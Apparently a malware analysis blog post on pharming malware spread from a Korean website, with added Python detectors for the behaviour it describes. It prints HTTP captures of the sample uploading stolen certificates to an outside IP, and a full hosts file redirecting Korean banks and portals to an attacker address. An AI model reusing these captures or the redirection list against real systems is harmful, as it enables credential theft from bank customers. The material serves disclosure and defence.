Pharming malware being distributed from the Daegu Jewelry RIS Project Group (대구주얼리RIS사업단) website

nopsled 2015. 4. 18. 16:07



FileName: java.exe
MD5: 9E89057C09D22FE07F486B1A39C23609
SHA-1: E6CBE9BC705F2BF0110AA6D52449A816461B6103
Packer: PECompact 2.0x Heuristic Mode -> Jeremy Collake

The site is currently being used as a distribution point. No exploit has been found on the site itself so far, but the binary has been uploaded to its top-level directory.





The sample creates a directory on the C:\ drive and registers itself in the registry so that it is launched automatically at Windows startup.




After dropping the malware under C:\, it builds the parameters needed to run it and launches the process with CreateProcessA.




The dropped DLL is run through rundll32.exe, which calls its KoolMine export; that code launches C:\Windows\System32\svchost.exe in the CREATE_SUSPENDED state.




It then writes malicious data into the suspended process with WriteProcessMemory, and the injected code carries out the actual malicious behaviour.
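The rundll32 -> svchost chain above is visible in ordinary process-creation telemetry, so it can be caught without any knowledge of the payload. The following detection logic is an added example and is not code from the original post: the `ProcEvent` records are constructed Sysmon-style events, and the field names, PIDs and the drop directory `C:\example_dropdir` are assumptions of this example (the post does not name the directory the sample creates).

```python
"""Flag the rundll32 -> svchost process chain described above.

Added example, not from the original post. The ProcEvent records below are
constructed Sysmon-style process-creation events; field names, PIDs and the
drop directory "C:\\example_dropdir" are assumptions of this example.
"""
from dataclasses import dataclass
from typing import Dict, List

WINDOWS_DIR = "c:\\windows"


@dataclass
class ProcEvent:
    pid: int
    image: str         # full path of the newly created process
    cmdline: str       # its command line
    parent_image: str  # full path of the parent process


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def rundll32_dll(cmdline: str) -> str:
    """Return the DLL path rundll32 was asked to load (the part before the
    ',Export' separator), or "" if there is no argument."""
    parts = cmdline.split(None, 1)
    if len(parts) < 2:
        return ""
    arg = parts[1].strip().lstrip('"')
    return arg.split(",", 1)[0].strip().rstrip('"')


def check_event(ev: ProcEvent) -> List[str]:
    """Apply two rules derived from the behaviour described in the post."""
    findings = []
    image, parent = _basename(ev.image), _basename(ev.parent_image)
    # Rule 1: rundll32 loading a DLL that does not live under the Windows
    # directory (the dropped DLL is run from the directory created on C:\).
    if image == "rundll32.exe":
        dll = rundll32_dll(ev.cmdline)
        if dll and not dll.lower().startswith(WINDOWS_DIR):
            findings.append(f"rundll32 loading DLL outside Windows dir: {dll}")
    # Rule 2: svchost.exe is normally a child of services.exe; a copy started
    # by anything else is a classic injection host.
    if image == "svchost.exe" and parent != "services.exe":
        findings.append(f"svchost.exe spawned by {parent}")
    return findings


def scan(events: List[ProcEvent]) -> Dict[int, List[str]]:
    """Map PID -> findings for every event that trips at least one rule."""
    result = {}
    for ev in events:
        found = check_event(ev)
        if found:
            result[ev.pid] = found
    return result


SAMPLE_EVENTS = [  # constructed telemetry, not from the post
    ProcEvent(1001, r"C:\Windows\System32\svchost.exe", "svchost.exe -k netsvcs",
              r"C:\Windows\System32\services.exe"),                     # benign
    ProcEvent(2002, r"C:\Windows\System32\rundll32.exe",
              r'rundll32.exe "C:\Windows\System32\shell32.dll",Control_RunDLL',
              r"C:\Windows\explorer.exe"),                               # benign
    ProcEvent(3003, r"C:\Windows\System32\rundll32.exe",
              r"rundll32.exe C:\example_dropdir\payload.dll,KoolMine",
              r"C:\example_dropdir\java.exe"),                           # dropped DLL
    ProcEvent(3004, r"C:\Windows\System32\svchost.exe", "svchost.exe",
              r"C:\Windows\System32\rundll32.exe"),                      # injection host
]

if __name__ == "__main__":
    for pid, findings in scan(SAMPLE_EVENTS).items():
        print(pid, findings)
```

The CREATE_SUSPENDED flag itself does not show up in a process-creation event, which is why rule 2 keys on the parent instead; the later WriteProcessMemory step would need a process-access event (Sysmon event 10 or an EDR equivalent) to be seen directly. Rule 2 should be tuned against a baseline of the environment before it is used for alerting.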




GET /fcg-bin/cgi_get_portrait.fcg?uins=2835357196?=28182 HTTP/1.1

Accept: */*

Accept-Language: ko

Cache-Control: no-cache

Content-Type: application/x-www-form-urlencoded

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 1.0.3705)

Host: users.qzone.qq.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: QZHTTP-2.37.1

Content-Encoding: gzip

Cache-Control: max-age=86400

Content-Type: text/html

Content-Length: 120

Date: Sat, 18 Apr 2015 07:04:19 GMT

Connection: keep-alive

Vary: Accept-Encoding


..........+./*)J.,qN..qJL...V2.065657.4S..V.()).../..O.7.+../J.+,.K.../...K.G(Gf...(........T240.343.37.3....j..2...{... 

Likewise, the pharming IP is retrieved from users.qzone.qq.com.



GET /ip.php?=1181 HTTP/1.1

Accept: */*

Accept-Language: ko

Cache-Control: no-cache

Content-Type: application/x-www-form-urlencoded

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 1.0.3705)

Host: 107.163.72.4

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Sat, 18 Apr 2015 07:04:15 GMT

Server: Apache/2.2.4 (Win32) PHP/5.2.3

X-Powered-By: PHP/5.2.3

Content-Length: 32

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Content-Type: text/html

Content-Language: ko


5b3412f55ff8ec4bd2a99b059084256d

POST /upload.php HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*

Referer: http://107.163.72.4/upload.php

Accept-Language: zh-cn

Content-Type: multipart/form-data; boundary=---------------------------7da3e1bd0314

Content-Length: 295

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)

Host: 107.163.72.4

Cache-Control: no-cache


-----------------------------7da3e1bd0314

Content-Disposition: form-data; name="upload_file1"; filename="C:\DOCUME~1\nopsled\LOCALS~1\Temp\35c5c8545035186fd745d56e11d8692c.zip"

Content-Type: application/x-zip-compressed


PK....................

-----------------------------7da3e1bd0314--

HTTP/1.1 200 OK

Date: Sat, 18 Apr 2015 07:04:18 GMT

Server: Apache/2.2.4 (Win32) PHP/5.2.3

X-Powered-By: PHP/5.2.3

Content-Length: 0

Content-Type: text/html;charset=utf-8

Content-Language: ko


After hashing the IP it exfiltrates the certificate. As usual, the server is running APMSetup.
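The three captures above share a few traits that are cheap to look for in proxy or IDS logs: a query string whose parameter has no name (`?=1181`, `uins=...?=28182`), a Host header that is a bare IP, and a multipart upload of a .zip named with 32 hex characters. The triage logic below is an added example, not code from the original post: `SAMPLES` are constructed request records modelled on the captures (hosts and paths copied from them, the benign request and the user name in the temp path invented), and the record layout is an assumption of this example rather than any real proxy's log format.

```python
"""Triage HTTP requests for the C2 pattern seen in the captures above.

Added example, not from the original post. SAMPLES are constructed request
records modelled on the captures; the record layout is an assumption of this
example, not any real proxy's log format.
"""
import re
from typing import Dict, List
from urllib.parse import urlsplit

# '?=1181' or '...?=28182': a query value with no parameter name
EMPTY_PARAM = re.compile(r"[?&]=")
# Host header that is a bare IPv4 literal (optionally with a port)
IP_HOST = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?$")
# multipart file part whose name is 32 hex chars + .zip (an MD5-style name)
HEX32_ZIP = re.compile(r'filename="[^"]*[0-9a-f]{32}\.zip"', re.IGNORECASE)

REASON_EMPTY_PARAM = "empty query parameter name"
REASON_IP_HOST = "Host header is a bare IP address"
REASON_HEX_ZIP = "multipart upload of a 32-hex-named .zip"


def inspect_request(req: Dict) -> List[str]:
    """req has 'method', 'target', 'headers' (dict) and 'body' (str)."""
    reasons = []
    query = urlsplit(req["target"]).query
    if EMPTY_PARAM.search("?" + query):
        reasons.append(REASON_EMPTY_PARAM)
    if IP_HOST.match(req["headers"].get("Host", "")):
        reasons.append(REASON_IP_HOST)
    ctype = req["headers"].get("Content-Type", "")
    if (req["method"] == "POST" and ctype.startswith("multipart/form-data")
            and HEX32_ZIP.search(req["body"])):
        reasons.append(REASON_HEX_ZIP)
    return reasons


def triage(requests: List[Dict], min_reasons: int = 1) -> Dict[int, List[str]]:
    """Index -> reasons for every request with at least min_reasons hits."""
    out = {}
    for i, req in enumerate(requests):
        reasons = inspect_request(req)
        if len(reasons) >= min_reasons:
            out[i] = reasons
    return out


SAMPLES = [  # constructed from the captures above plus one benign request
    {"method": "GET", "target": "/fcg-bin/cgi_get_portrait.fcg?uins=2835357196?=28182",
     "headers": {"Host": "users.qzone.qq.com"}, "body": ""},
    {"method": "GET", "target": "/ip.php?=1181",
     "headers": {"Host": "107.163.72.4"}, "body": ""},
    {"method": "POST", "target": "/upload.php",
     "headers": {"Host": "107.163.72.4",
                 "Content-Type": "multipart/form-data; boundary=---------------------------7da3e1bd0314"},
     "body": ("-----------------------------7da3e1bd0314\r\n"
              'Content-Disposition: form-data; name="upload_file1"; '
              'filename="C:\\DOCUME~1\\user\\LOCALS~1\\Temp\\35c5c8545035186fd745d56e11d8692c.zip"\r\n'
              "Content-Type: application/x-zip-compressed\r\n\r\nPK...\r\n"
              "-----------------------------7da3e1bd0314--")},
    {"method": "GET", "target": "/index.html?q=1",
     "headers": {"Host": "www.example.com"}, "body": ""},  # benign, invented
]

if __name__ == "__main__":
    for idx, reasons in triage(SAMPLES).items():
        print(idx, SAMPLES[idx]["target"], reasons)
```

users.qzone.qq.com is a legitimate Tencent service used here only as a dead drop, so the hostname alone is not a good indicator; requiring two reasons (`triage(SAMPLES, min_reasons=2)`) keeps the bare-IP requests to 107.163.72.4 and drops the single-signal qzone request, which is the sensible default for alerting.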



100.43.168.180    shinhan.com

100.43.168.180    www.shinhan.com

100.43.168.180    search.daum.net

100.43.168.180    search.naver.com

100.43.168.180    kisa.kbstcr.com

100.43.168.180    kisa.shinhcn.com

100.43.168.180    kisa.ibk.co.kr

100.43.168.180    kisa.kab.co.kr

100.43.168.180    kisa.kfcc.co.kr.r

100.43.168.180    kisa.kbstor.com.r

100.43.168.180    KisA.nONGhuyp.coM.r

100.43.168.180    kisa.shinhon.com.r

100.43.168.180    kisa.wooribenk.com.r

100.43.168.180    kisa.honabenk.com.r

100.43.168.180    kisa.epostbenk.go.kr.r

100.43.168.180    kisa.idk.co.kr.r

100.43.168.180    kisa.kcb.co.kr.r

100.43.168.180    kisa.kfoc.co.kr.r

100.43.168.180    kisa.hanabenk.com.r

100.43.168.180    www.kbstar.com.r

100.43.168.180    www.nonghyup.com.r

100.43.168.180    www.shinhan.com.r

100.43.168.180    www.wooribank.com.r

100.43.168.180    www.hanabank.com.r

100.43.168.180    www.epostbank.go.kr.r

100.43.168.180    www.ibk.co.kr.r

100.43.168.180    www.idk.co.kr

100.43.168.180    www.keb.co.kr.r

100.43.168.180    www.kfcc.co.kr.r

100.43.168.180    BestLotto.co.kr

100.43.168.180    LottoRICH.Co.kr

100.43.168.180    lottok.co.kr

100.43.168.180    basiclotto.co.kr

100.43.168.180    lotto369.net

100.43.168.180    g9.co.kr

100.43.168.180    lottons.com

100.43.168.180    lottopangpang.co.kr

100.43.168.180    lottogold.co.kr

100.43.168.180    lottoplay.co.kr

100.43.168.180    lottorich.co.kr

100.43.168.180    lottosmart.kr

100.43.168.180    nlotto.co.kr

100.43.168.180    www.BestLotto.co.kr

100.43.168.180    www.LottoRICH.Co.kr

100.43.168.180    www.lottok.co.kr

100.43.168.180    www.basiclotto.co.kr

100.43.168.180    www.lotto369.net

100.43.168.180    www.g9.co.kr

100.43.168.180    www.lottons.com

100.43.168.180    lottopangpang.co.kr

100.43.168.180    www.lottogold.co.kr

100.43.168.180    www.lottoplay.co.kr

100.43.168.180    www.lottorich.co.kr

100.43.168.180    www.lottosmart.kr

100.43.168.180    www.nlotto.co.kr

100.43.168.180    

100.43.168.180    www.bing.com

100.43.168.180    www.11st.co.kr

100.43.168.180    www.gmarket.net

100.43.168.180    www.google.co.kr

100.43.168.180    nate.com

100.43.168.180    www.nate.com

100.43.168.180    daum.com

100.43.168.180    daum.co.kr

100.43.168.180    www.daum.co.kr

100.43.168.180    www.daum.net

100.43.168.180    daum.net

100.43.168.180    www.zum.com

100.43.168.180    zum.com

100.43.168.180    kisa.nenghuyp.com

100.43.168.180    kisa.honabenk.com

100.43.168.180    kisa.idk.co.kr

100.43.168.180    kisa.kcb.co.kr

100.43.168.180    kisa.kfoc.co.kr

100.43.168.180    naver.com

100.43.168.180    www.naver.co.kr

100.43.168.180    naver.co.kr

100.43.168.180    www.nonghyup.com

100.43.168.180    www.naver.com

100.43.168.180    naver.kr

100.43.168.180    www.naver.kr

100.43.168.180    kisa.kbstor.com

100.43.168.180    kisa.nonghuyp.com

100.43.168.180    kisa.shinhon.com

100.43.168.180    kisa.wooribenk.com

100.43.168.180    kisa.ibek.co.kr

100.43.168.180    kisa.epostbenk.go.kr

100.43.168.180    kisa.hanabenk.com

100.43.168.180    kisa.keb.co.kr

100.43.168.180    kisa.kfcc.co.kr

100.43.168.180    www.nate.net

100.43.168.180    www.nate.co.kr

100.43.168.180    nate.co.kr

100.43.168.180    hanmail.net

100.43.168.180    www.hanmail.net

100.43.168.180    www.hanacbs.com

100.43.168.180    kfcc.co.kr

100.43.168.180    www.kfcc.co.kr

100.43.168.180    www.daum.net

100.43.168.180    daum.net

100.43.168.180    www.kbstor.com

100.43.168.180    www.nonghuyp.com

100.43.168.180    www.shinhon.com

100.43.168.180    www.wooribenk.com

100.43.168.180    www.ibek.co.kr

100.43.168.180    www.epostbenk.go.kr

100.43.168.180    www.hanabenk.com

100.43.168.180    www.keb.co.kr

100.43.168.180    www.citibank.co.kr

100.43.168.180    www.citibank.co.kr.r

100.43.168.180    www.standardchartered.co.kr.r

100.43.168.180    www.standardchartered.co.kr

100.43.168.180    www.suhyup-bank.com.r

100.43.168.180    www.suhyup-bank.com

100.43.168.180    www.kjbank.com.r

100.43.168.180    www.kjbank.com

100.43.168.180    openbank.cu.co.kr.r

100.43.168.180    openbank.cu.co.kr

100.43.168.180    www.knbank.co.kr

100.43.168.180    www.knbank.co.kr.r

100.43.168.180    www.busanbank.co.kr.r 

Old-fashioned pharming that tampers with the hosts file.
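A hosts file like the one above is easy to audit mechanically: one non-loopback IP mapped to dozens of names, and many of those names being exact or near-miss copies of bank and portal domains (wooribenk, shinhon, honabenk, nonghuyp). The audit below is an added example, not code from the original post: `WATCHLIST` and `SAMPLE_HOSTS` are constructed for this example (the domain names are taken from the list above), and the threshold of 5 hostnames per IP is an arbitrary starting point. It generalises slightly beyond the list, matching a watchlist domain against every label window of a hostname rather than just its suffix, so the `.r`-suffixed variants are still caught.

```python
"""Audit a hosts file for pharming-style redirection like the list above.

Added example, not from the original post. WATCHLIST and SAMPLE_HOSTS are
constructed for this example (the domain names are taken from the list
above); the threshold of 5 hostnames per IP is an arbitrary starting point.
"""
from collections import defaultdict
from typing import Dict, Iterator, List, Optional, Tuple

# Legitimate domains whose impersonation we care about (constructed watchlist)
WATCHLIST = [
    "shinhan.com", "wooribank.com", "hanabank.com", "nonghyup.com",
    "kbstar.com", "ibk.co.kr", "epostbank.go.kr", "naver.com", "daum.net",
]
LOOPBACK = {"127.0.0.1", "::1"}


def parse_hosts(text: str) -> Iterator[Tuple[str, str]]:
    """Yield (ip, hostname) pairs; comments and blank lines are skipped."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        ip, *names = line.split()
        for name in names:
            yield ip, name.lower()


def levenshtein(a: str, b: str) -> int:
    """Plain edit distance, used to spot typosquatted labels."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def closest_watchlist(name: str, max_dist: int = 2) -> Optional[Tuple[str, int]]:
    """Slide a window with the watchlist domain's label count over the
    hostname and return (domain, distance) of the nearest entry within
    max_dist. Windows rather than just the suffix, so 'www.wooribenk.com.r'
    still matches 'wooribank.com'."""
    labels = name.split(".")
    best = None
    for dom in WATCHLIST:
        k = dom.count(".") + 1
        for i in range(len(labels) - k + 1):
            d = levenshtein(".".join(labels[i:i + k]), dom)
            if d <= max_dist and (best is None or d < best[1]):
                best = (dom, d)
    return best


def audit_hosts(text: str, max_names_per_ip: int = 5) -> Dict[str, list]:
    """Return IPs that hoard hostnames and every watchlist/lookalike hit."""
    by_ip: Dict[str, List[str]] = defaultdict(list)
    for ip, name in parse_hosts(text):
        by_ip[ip].append(name)
    bulk_ips, hits = [], []
    for ip, names in by_ip.items():
        if ip in LOOPBACK:
            continue
        if len(names) >= max_names_per_ip:
            bulk_ips.append(ip)
        for name in names:
            match = closest_watchlist(name)
            if match:
                hits.append((ip, name, match[0], match[1]))
    return {"bulk_ips": bulk_ips, "watchlist_hits": hits}


def audit_file(path: str, **kw) -> Dict[str, list]:
    """Audit a hosts file on disk (Windows: %SystemRoot%\\System32\\drivers\\etc\\hosts)."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return audit_hosts(fh.read(), **kw)


SAMPLE_HOSTS = """\
# constructed sample: two normal lines, then entries mimicking the list above
127.0.0.1         localhost
::1               localhost
100.43.168.180    shinhan.com
100.43.168.180    www.shinhan.com
100.43.168.180    kisa.shinhon.com
100.43.168.180    www.wooribenk.com.r
100.43.168.180    www.naver.com
100.43.168.180    lotto369.net
"""

if __name__ == "__main__":
    report = audit_hosts(SAMPLE_HOSTS)
    print("IPs hoarding hostnames:", report["bulk_ips"])
    for ip, name, dom, dist in report["watchlist_hits"]:
        print(f"{ip} {name} -> {'exact' if dist == 0 else 'lookalike'} {dom} (distance {dist})")
```

The lookalike check deliberately ignores the leading `kisa.` and trailing `.r` labels by scanning windows, which is what makes the misspelt `kisa.shinhon.com` and `www.wooribenk.com.r` entries surface as distance-1 matches for `shinhan.com` and `wooribank.com`; the lotto domains are not on the watchlist, so they are reported only through the per-IP count. An edit distance of 2 on short labels will produce some noise against a large watchlist, so treat the `bulk_ips` signal as the primary one.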
